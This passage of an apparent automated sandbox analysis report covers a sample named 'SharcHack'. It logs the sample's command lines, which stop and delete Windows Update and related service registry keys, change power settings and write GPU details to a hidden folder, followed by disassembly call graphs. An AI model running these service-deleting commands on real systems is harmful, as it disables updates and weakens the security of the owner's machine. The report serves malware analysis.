                                                                                                                                                                                                                                    Start time:16:20:29
                                                                                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\powercfg.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:powercfg /x -standby-timeout-dc 0
                                                                                                                                                                                                                                    Imagebase:0x7ff77f210000
                                                                                                                                                                                                                                    File size:96'256 bytes
                                                                                                                                                                                                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:51
                                                                                                                                                                                                                                    Start time:16:20:29
                                                                                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:sc stop dosvc
                                                                                                                                                                                                                                    Imagebase:0x7ff6d9b80000
                                                                                                                                                                                                                                    File size:72'192 bytes
                                                                                                                                                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:52
                                                                                                                                                                                                                                    Start time:16:20:29
                                                                                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                                                                                                                                                                                                                                    Imagebase:0x7ff608820000
                                                                                                                                                                                                                                    File size:77'312 bytes
                                                                                                                                                                                                                                    MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:53
                                                                                                                                                                                                                                    Start time:16:20:29
                                                                                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                                                                                                                                                                                                                                    Imagebase:0x7ff608820000
                                                                                                                                                                                                                                    File size:77'312 bytes
                                                                                                                                                                                                                                    MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:54
                                                                                                                                                                                                                                    Start time:16:20:29
                                                                                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                                                                                                                                                                                                                                    Imagebase:0x7ff608820000
                                                                                                                                                                                                                                    File size:77'312 bytes
                                                                                                                                                                                                                                    MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:55
                                                                                                                                                                                                                                    Start time:16:20:30
                                                                                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                                                                                                                                                                                                                                    Imagebase:0x7ff608820000
                                                                                                                                                                                                                                    File size:77'312 bytes
                                                                                                                                                                                                                                    MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:56
                                                                                                                                                                                                                                    Start time:16:20:30
                                                                                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                                                                                                                                                                                                                    Imagebase:0x7ff608820000
                                                                                                                                                                                                                                    File size:77'312 bytes
                                                                                                                                                                                                                                    MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:58
                                                                                                                                                                                                                                    Start time:16:20:58
                                                                                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\System32\conhost.exe ubulqosn
                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                    Target ID:59
                                                                                                                                                                                                                                    Start time:16:20:58
                                                                                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
                                                                                                                                                                                                                                    Imagebase:0x7ff74e4d0000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:60
                                                                                                                                                                                                                                    Start time:16:20:58
                                                                                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:61
                                                                                                                                                                                                                                    Start time:16:20:58
                                                                                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
                                                                                                                                                                                                                                    Imagebase:0x7ff74e4d0000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Reset < >

                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                      Execution Coverage:2.2%
                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                                                                                      Total number of Nodes:104
                                                                                                                                                                                                                                      Total number of Limit Nodes:1
                                                                                                                                                                                                                                      execution_graph 380 401df4 GetTempPathA 383 401734 380->383 382 401e16 384 4016f8 383->384 387 4016cc 384->387 386 401708 386->382 388 4016d0 387->388 389 4016f4 387->389 392 4010c8 388->392 389->386 391 4016dd 391->386 393 4010d6 392->393 394 4010cc 392->394 393->391 394->393 397 401b08 394->397 396 401179 396->391 398 401b17 397->398 399 401b3d TlsGetValue 397->399 398->396 400 401b22 399->400 401 401b47 399->401 402 401b27 TlsGetValue 400->402 401->396 403 401b36 402->403 403->396 460 401cb4 465 4011ac 460->465 464 401ccc 466 4011e9 GetCurrentDirectoryA 465->466 467 4011bc GetCurrentDirectoryA SetCurrentDirectoryA 465->467 468 401209 466->468 469 4011fc SetCurrentDirectoryA 466->469 467->466 470 401734 2 API calls 468->470 469->468 471 401219 470->471 472 401754 471->472 473 401797 472->473 474 401758 472->474 473->464 475 401762 474->475 476 401688 474->476 477 401775 475->477 478 40178c 475->478 481 4016cc 2 API calls 476->481 482 40169c 476->482 480 401914 2 API calls 477->480 479 401914 2 API calls 478->479 483 40177a 479->483 480->483 481->482 482->464 483->464 404 401d68 GetSystemDirectoryA 405 401734 2 API calls 404->405 406 401db1 405->406 409 401798 406->409 408 401dc3 410 40179c 409->410 411 401754 409->411 410->411 412 401688 410->412 414 4017ba 410->414 415 4017ac 410->415 411->412 418 401797 411->418 420 401762 411->420 413 40169c 412->413 416 4016cc 2 API calls 412->416 413->408 417 4016cc 2 API calls 414->417 436 401688 415->436 416->413 425 4017cd 417->425 418->408 421 401775 420->421 422 40178c 420->422 429 401914 421->429 423 401914 2 API calls 422->423 427 40177a 423->427 426 401688 2 API calls 425->426 428 4017f9 426->428 427->408 428->408 430 401921 429->430 434 40193b 429->434 431 40194a 430->431 432 40192d 430->432 433 4016cc 2 API calls 431->433 440 4010f8 432->440 433->434 434->427 437 40168c 436->437 439 40169c 436->439 438 4016cc 2 API calls 437->438 437->439 438->439 439->411 442 4010fe 440->442 441 401110 441->434 442->434 442->441 443 401b08 2 API calls 442->443 444 401179 443->444 444->434 445 401e28 73AC1370 446 401734 2 API calls 445->446 447 401e74 446->447 448 401798 2 API calls 447->448 449 401e86 448->449 484 401ff8 485 40200d 484->485 488 401728 485->488 487 402016 489 4016f8 488->489 490 4016cc 2 API calls 489->490 491 401708 490->491 491->487 450 4020cc 451 4020d4 450->451 451->451 454 401b54 GetModuleHandleA 451->454 453 4020e9 455 401b87 454->455 455->453 456 40190c 457 4018cc 456->457 458 4016cc 2 API calls 457->458 459 4018e3 457->459 458->459 497 401cdc GetWindowsDirectoryA 498 401734 2 API calls 497->498 499 401d25 498->499 500 401798 2 API calls 499->500 501 401d37 500->501

                                                                                                                                                                                                                                      Callgraph

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 0 401df4-401e11 GetTempPathA call 401734 2 401e16-401e1d 0->2
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetTempPathA.KERNEL32(00000104,?,?,00402214,00402368,00000000,00404690,00000000,00000000,00000000,00000000,00000000,00000000,40000000,00000002,00000000), ref: 00401E03
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2061151113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2061127944.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2061174295.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2061226756.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2061226756.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SharcHack.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: PathTemp
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2920410445-0
                                                                                                                                                                                                                                      • Opcode ID: 6cf1d2df8bd522a178f4ed81ea5d7cdc32367c966c146d3297076e8c248fb5b9
                                                                                                                                                                                                                                      • Instruction ID: 513a9b3b554f811413e29e48005847e0932e621cb9bcb8d43a6f4abbd4cc9e18
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6cf1d2df8bd522a178f4ed81ea5d7cdc32367c966c146d3297076e8c248fb5b9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F2C08CA1B8120013E20020AA4C836EA30498388320F90003A3BA5AA3D2ECAE599511AB

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentDirectoryA.KERNEL32(00000105,?,00000000,?,00401CC0,?,00402287,00402368,00000000,00404690,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004011DE
                                                                                                                                                                                                                                      • SetCurrentDirectoryA.KERNEL32(?,00000105,?,00000000,?,00401CC0,?,00402287,00402368,00000000,00404690,00000000,00000000,00000000,00000000,00000000), ref: 004011E4
                                                                                                                                                                                                                                      • GetCurrentDirectoryA.KERNEL32(00000105,?,00000000,?,00401CC0,?,00402287,00402368,00000000,00404690,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004011F3
                                                                                                                                                                                                                                      • SetCurrentDirectoryA.KERNEL32(?,00000105,?,00000000,?,00401CC0,?,00402287,00402368,00000000,00404690,00000000,00000000,00000000,00000000,00000000), ref: 00401204
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2061151113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2061127944.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2061174295.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2061226756.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2061226756.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SharcHack.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CurrentDirectory
                                                                                                                                                                                                                                      • String ID: :
                                                                                                                                                                                                                                      • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                      • Opcode ID: 2ca17c48bc424910a8f9f500c9fc05f368bba687e9ee49d64decfca2fad3f822
                                                                                                                                                                                                                                      • Instruction ID: d7ef50a895c70e87defade85c564fe35ef19071810822f113715ad03dbd86815
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2ca17c48bc424910a8f9f500c9fc05f368bba687e9ee49d64decfca2fad3f822
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4BF096712447C41ED310E6788852BDB72DC8B55344F04843EB6D8EB3D2F67989888767

                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                      Execution Coverage:13.2%
                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                      Signature Coverage:38.4%
                                                                                                                                                                                                                                      Total number of Nodes:865
                                                                                                                                                                                                                                      Total number of Limit Nodes:5
                                                                                                                                                                                                                                      execution_graph 5003 7ff69af15d40 5004 7ff69af15d60 EnterCriticalSection 5003->5004 5005 7ff69af15d51 5003->5005 5006 7ff69af15d79 5004->5006 5007 7ff69af15d93 LeaveCriticalSection 5004->5007 5006->5007 5008 7ff69af15d7f free LeaveCriticalSection 5006->5008 5009 7ff69af15da0 5007->5009 5008->5009 5307 7ff69af160c0 5308 7ff69af160d7 5307->5308 5309 7ff69af16155 5307->5309 5310 7ff69af16101 calloc 5308->5310 5310->5309 5311 7ff69af16118 EnterCriticalSection LeaveCriticalSection 5310->5311 5014 7ff69af1b340 5017 7ff69af1aa60 5014->5017 5024 7ff69af1a940 5017->5024 5020 7ff69af1aa74 malloc 5021 7ff69af1aaa1 5020->5021 5022 7ff69af1aab0 5020->5022 5021->5022 5023 7ff69af1aae3 LeaveCriticalSection 5021->5023 5023->5022 5025 7ff69af1a9c0 EnterCriticalSection 5024->5025 5026 7ff69af1a954 5024->5026 5029 7ff69af1a958 5025->5029 5028 7ff69af1a991 InitializeCriticalSection InitializeCriticalSection 5026->5028 5026->5029 5027 7ff69af1a97b 5027->5020 5027->5021 5028->5029 5029->5025 5029->5027 5030 7ff69af1a964 Sleep 5029->5030 5030->5029 5030->5030 5031 7ff69af18b49 5032 7ff69af18b4e localeconv 5031->5032 5033 7ff69af18b40 5031->5033 5036 7ff69af1b710 5032->5036 5037 7ff69af1b73e 5036->5037 5040 7ff69af1b5a0 5037->5040 5039 7ff69af18b88 5041 7ff69af1b6d3 5040->5041 5043 7ff69af1b5b5 5040->5043 5041->5039 5042 7ff69af1b671 5042->5039 5043->5042 5044 7ff69af1b654 5043->5044 5045 7ff69af1b5e9 IsDBCSLeadByteEx 5043->5045 5049 7ff69af1b604 5043->5049 5046 7ff69af1b65f 5044->5046 5047 7ff69af1b6a0 MultiByteToWideChar 5044->5047 5045->5044 5045->5049 5046->5039 5047->5042 5048 7ff69af1b6e3 _errno 5047->5048 5048->5042 5049->5042 5050 7ff69af1b62e MultiByteToWideChar 5049->5050 5050->5048 5051 7ff69af1b648 5050->5051 5051->5039 5052 7ff69af1864a 5054 7ff69af18658 5052->5054 5053 7ff69af18d69 5054->5053 5055 7ff69af16da0 2 API calls 5054->5055 5055->5054 5056 7ff69af15250 5057 7ff69af15259 5056->5057 5058 7ff69af1525d 5057->5058 5061 7ff69af15de0 5057->5061 5060 7ff69af15275 5062 7ff69af15e85 5061->5062 5065 7ff69af15dee 5061->5065 5063 7ff69af15e8f 5062->5063 5064 7ff69af15ec0 InitializeCriticalSection 5062->5064 5063->5060 5064->5063 5066 7ff69af15e61 DeleteCriticalSection 5065->5066 5067 7ff69af15df2 5065->5067 5068 7ff69af15e50 free 5065->5068 5066->5067 5067->5060 5068->5066 5068->5068 4988 7ff69af1b550 4989 7ff69af1b569 4988->4989 4990 7ff69af1b560 4988->4990 4992 7ff69af16060 4990->4992 4993 7ff69af16068 4992->4993 4994 7ff69af16070 TlsGetValue 4992->4994 4993->4989 4999 7ff69af15ee0 4994->4999 4997 7ff69af15ee0 free 4998 7ff69af160b4 4997->4998 4998->4989 5000 7ff69af15f0c TlsSetValue TlsFree 4999->5000 5001 7ff69af15ef2 free 4999->5001 5000->4997 5001->5000 5069 7ff69af18557 5070 7ff69af18574 5069->5070 5074 7ff69af1857c 5069->5074 5077 7ff69af17300 5070->5077 5072 7ff69af18d8f wcslen 5073 7ff69af186bc 5075 7ff69af16da0 2 API calls 5073->5075 5074->5072 5074->5073 5076 7ff69af186d4 5075->5076 5078 7ff69af17340 strlen 5077->5078 5079 7ff69af17325 5077->5079 5078->5079 5079->5078 5080 7ff69af1ba59 SetUnhandledExceptionFilter 5322 7ff69af185dd 5323 7ff69af18b40 5322->5323 5325 7ff69af185e6 5322->5325 5324 7ff69af16da0 2 API calls 5324->5325 5325->5324 5326 7ff69af18d69 5325->5326 4463 7ff69af114e0 4466 7ff69af11180 4463->4466 4465 7ff69af114f6 4467 7ff69af11480 GetStartupInfoW 4466->4467 4468 7ff69af111b4 4466->4468 4473 7ff69af113ee 4467->4473 4469 7ff69af111dc Sleep 4468->4469 4470 7ff69af111f1 4468->4470 4469->4468 4471 7ff69af1144c _initterm 4470->4471 4472 7ff69af11224 4470->4472 4470->4473 4471->4472 4484 7ff69af156a0 4472->4484 4473->4465 4475 7ff69af1124c SetUnhandledExceptionFilter 4476 7ff69af1126f 4475->4476 4477 7ff69af112f3 malloc 4476->4477 4478 7ff69af113b5 4477->4478 4481 7ff69af1131e 4477->4481 4506 7ff69af11880 4478->4506 4479 7ff69af1134d 4480 7ff69af11351 malloc memcpy 4479->4480 4479->4481 4480->4479 4482 7ff69af113b0 4480->4482 4481->4479 4481->4481 4482->4478 4486 7ff69af156d3 4484->4486 4490 7ff69af156c2 4484->4490 4485 7ff69af15982 4487 7ff69af1598b 4485->4487 4485->4490 4486->4485 4486->4490 4499 7ff69af1574b 4486->4499 4488 7ff69af154a0 8 API calls 4487->4488 4492 7ff69af159d5 4487->4492 4488->4487 4489 7ff69af15a02 4491 7ff69af15430 8 API calls 4489->4491 4490->4475 4494 7ff69af15a0e 4491->4494 4737 7ff69af15430 4492->4737 4494->4475 4495 7ff69af157a1 4498 7ff69af154a0 8 API calls 4495->4498 4495->4499 4504 7ff69af15823 4495->4504 4706 7ff69af154a0 4495->4706 4496 7ff69af159ee 4500 7ff69af15430 8 API calls 4496->4500 4497 7ff69af1596c 4501 7ff69af154a0 8 API calls 4497->4501 4498->4495 4499->4489 4499->4490 4499->4492 4499->4495 4499->4496 4499->4497 4499->4504 4500->4489 4502 7ff69af1597d 4501->4502 4502->4475 4504->4490 4505 7ff69af15852 VirtualProtect 4504->4505 4505->4504 4507 7ff69af11896 4506->4507 4767 7ff69af16790 4507->4767 4509 7ff69af11908 4510 7ff69af16790 19 API calls 4509->4510 4547 7ff69af12e3e 4509->4547 4512 7ff69af11920 4510->4512 4511 7ff69af16790 19 API calls 4516 7ff69af12edd 4511->4516 4513 7ff69af16790 19 API calls 4512->4513 4514 7ff69af11986 4513->4514 4515 7ff69af16790 19 API calls 4514->4515 4517 7ff69af11995 4515->4517 4518 7ff69af16790 19 API calls 4516->4518 4520 7ff69af11a0b _wgetenv 4517->4520 4519 7ff69af12f31 4518->4519 4523 7ff69af12fb4 memset 4519->4523 4795 7ff69af140d0 4520->4795 4522 7ff69af11a33 memset 4524 7ff69af16790 19 API calls 4522->4524 4525 7ff69af140d0 wcscat 4523->4525 4526 7ff69af11a67 4524->4526 4527 7ff69af12fe1 memset 4525->4527 4528 7ff69af16790 19 API calls 4526->4528 4529 7ff69af140d0 wcscat 4527->4529 4530 7ff69af11a76 4528->4530 4531 7ff69af13001 4529->4531 4532 7ff69af140d0 wcscat 4530->4532 4533 7ff69af11560 43 API calls 4531->4533 4579 7ff69af13138 4531->4579 4534 7ff69af11afc memset 4532->4534 4535 7ff69af1303c 4533->4535 4537 7ff69af16790 19 API calls 4534->4537 4806 7ff69af14580 4535->4806 4536 7ff69af16790 19 API calls 4538 7ff69af131a4 memcpy 4536->4538 4539 7ff69af11b83 4537->4539 4541 7ff69af131d6 4538->4541 4542 7ff69af12e34 4539->4542 4545 7ff69af16790 19 API calls 4539->4545 4544 7ff69af16790 19 API calls 4542->4544 4543 7ff69af13051 4809 7ff69af14730 4543->4809 4544->4547 4548 7ff69af11b9b 4545->4548 4547->4511 4551 7ff69af140d0 wcscat 4548->4551 4549 7ff69af13064 memcpy 4550 7ff69af16790 19 API calls 4549->4550 4552 7ff69af13085 4550->4552 4553 7ff69af11be0 memcpy 4551->4553 4556 7ff69af16790 19 API calls 4552->4556 4552->4579 4554 7ff69af16790 19 API calls 4553->4554 4555 7ff69af11c09 4554->4555 4557 7ff69af12df8 4555->4557 4560 7ff69af16790 19 API calls 4555->4560 4558 7ff69af1309d 4556->4558 4559 7ff69af16790 19 API calls 4557->4559 4563 7ff69af13a30 35 API calls 4558->4563 4561 7ff69af12e02 memcpy 4559->4561 4562 7ff69af11c21 4560->4562 4561->4542 4799 7ff69af13a30 4562->4799 4564 7ff69af130f9 4563->4564 4567 7ff69af16790 19 API calls 4564->4567 4566 7ff69af11c80 memcpy 4568 7ff69af16790 19 API calls 4566->4568 4575 7ff69af13103 4567->4575 4569 7ff69af11ca1 4568->4569 4570 7ff69af12dbc 4569->4570 4572 7ff69af16790 19 API calls 4569->4572 4571 7ff69af16790 19 API calls 4570->4571 4573 7ff69af12dc6 memcpy 4571->4573 4574 7ff69af11cb9 4572->4574 4573->4557 4576 7ff69af13a30 35 API calls 4574->4576 4577 7ff69af16790 19 API calls 4575->4577 4578 7ff69af11d17 memcpy 4576->4578 4577->4579 4580 7ff69af16790 19 API calls 4578->4580 4579->4536 4581 7ff69af11d38 4580->4581 4583 7ff69af16790 19 API calls 4581->4583 4592 7ff69af12d0c 4581->4592 4582 7ff69af16790 19 API calls 4584 7ff69af12d8a memcpy 4582->4584 4585 7ff69af11d50 4583->4585 4584->4570 4586 7ff69af13a30 35 API calls 4585->4586 4587 7ff69af11db7 memset GetModuleFileNameW memset 4586->4587 4588 7ff69af16790 19 API calls 4587->4588 4589 7ff69af11e48 4588->4589 4590 7ff69af16790 19 API calls 4589->4590 4616 7ff69af12ca1 4589->4616 4593 7ff69af11e5d 4590->4593 4591 7ff69af16790 19 API calls 4591->4592 4592->4582 4594 7ff69af16790 19 API calls 4593->4594 4595 7ff69af11ed6 4594->4595 4596 7ff69af16790 19 API calls 4595->4596 4597 7ff69af11ee7 4596->4597 4598 7ff69af11f71 _wgetenv 4597->4598 4599 7ff69af140d0 wcscat 4598->4599 4600 7ff69af11f85 memcpy 4599->4600 4601 7ff69af16790 19 API calls 4600->4601 4602 7ff69af11fa6 4601->4602 4603 7ff69af16790 19 API calls 4602->4603 4604 7ff69af11fb5 4603->4604 4605 7ff69af11ff1 4604->4605 4606 7ff69af11fbe memcpy 4604->4606 4607 7ff69af13a30 35 API calls 4605->4607 4606->4605 4608 7ff69af12065 memset 4607->4608 4609 7ff69af16790 19 API calls 4608->4609 4610 7ff69af120ad 4609->4610 4611 7ff69af120b6 4610->4611 4612 7ff69af12c90 4610->4612 4613 7ff69af16790 19 API calls 4611->4613 4614 7ff69af16790 19 API calls 4612->4614 4615 7ff69af120c2 4613->4615 4614->4616 4617 7ff69af140d0 wcscat 4615->4617 4616->4591 4618 7ff69af12102 _wcsicmp 4617->4618 4618->4535 4619 7ff69af12115 memset 4618->4619 4620 7ff69af16790 19 API calls 4619->4620 4621 7ff69af12156 4620->4621 4622 7ff69af16790 19 API calls 4621->4622 4623 7ff69af12165 4622->4623 4624 7ff69af140d0 wcscat 4623->4624 4625 7ff69af121f8 4624->4625 4814 7ff69af11730 4625->4814 4627 7ff69af12206 4628 7ff69af16790 19 API calls 4627->4628 4629 7ff69af12263 4628->4629 4629->4516 4630 7ff69af1226c 4629->4630 4631 7ff69af16790 19 API calls 4630->4631 4632 7ff69af12278 4631->4632 4820 7ff69af11560 4632->4820 4635 7ff69af16790 19 API calls 4636 7ff69af12327 4635->4636 4636->4575 4637 7ff69af16790 19 API calls 4636->4637 4638 7ff69af1233f 4637->4638 4639 7ff69af16790 19 API calls 4638->4639 4640 7ff69af123b3 4639->4640 4641 7ff69af16790 19 API calls 4640->4641 4642 7ff69af123c2 4641->4642 4643 7ff69af12442 _wgetenv 4642->4643 4644 7ff69af140d0 wcscat 4643->4644 4645 7ff69af12463 memset 4644->4645 4646 7ff69af16790 19 API calls 4645->4646 4647 7ff69af12497 4646->4647 4648 7ff69af16790 19 API calls 4647->4648 4649 7ff69af124a6 4648->4649 4650 7ff69af140d0 wcscat 4649->4650 4651 7ff69af1252f 4650->4651 4652 7ff69af11730 19 API calls 4651->4652 4653 7ff69af1253d 4652->4653 4654 7ff69af14730 26 API calls 4653->4654 4655 7ff69af1254f 4654->4655 4838 7ff69af13af0 memset 4655->4838 4657 7ff69af1255d 4658 7ff69af16790 19 API calls 4657->4658 4659 7ff69af1256b 4658->4659 4659->4564 4660 7ff69af16790 19 API calls 4659->4660 4661 7ff69af12583 4660->4661 4662 7ff69af16790 19 API calls 4661->4662 4663 7ff69af12613 4662->4663 4664 7ff69af16790 19 API calls 4663->4664 4665 7ff69af12622 4664->4665 4665->4665 4666 7ff69af16790 19 API calls 4665->4666 4667 7ff69af12731 4666->4667 4668 7ff69af16790 19 API calls 4667->4668 4669 7ff69af12740 4668->4669 4670 7ff69af127c2 memcpy 4669->4670 4671 7ff69af16790 19 API calls 4670->4671 4672 7ff69af127e8 4671->4672 4673 7ff69af16790 19 API calls 4672->4673 4674 7ff69af127f7 4673->4674 4675 7ff69af1282c 4674->4675 4676 7ff69af127ff memcpy 4674->4676 4677 7ff69af16790 19 API calls 4675->4677 4676->4675 4678 7ff69af12883 4677->4678 4679 7ff69af16790 19 API calls 4678->4679 4680 7ff69af12892 4679->4680 4681 7ff69af16790 19 